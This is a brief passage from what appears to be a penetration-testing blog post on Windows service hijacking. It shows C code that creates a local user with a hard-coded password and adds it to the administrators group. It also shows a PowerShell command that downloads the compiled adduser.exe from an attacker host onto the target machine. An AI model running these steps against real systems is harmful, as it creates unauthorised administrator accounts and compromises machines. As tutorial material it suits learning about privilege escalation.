ST4RGUARD/ST4RGUARD.github.io/_posts/2023-09-15-win_service_hijack.md

     i = system ("net user user2 password123! /add");
     i = system ("net localgroup administrators user2 /add");

+### of course running as system we can do many things like edit existing users passwords to access their system

 since we have access to the target machine we will copy the binary over

     PS > iwr -uri http://192.168.1.1/adduser.exe -Outfile adduser.exe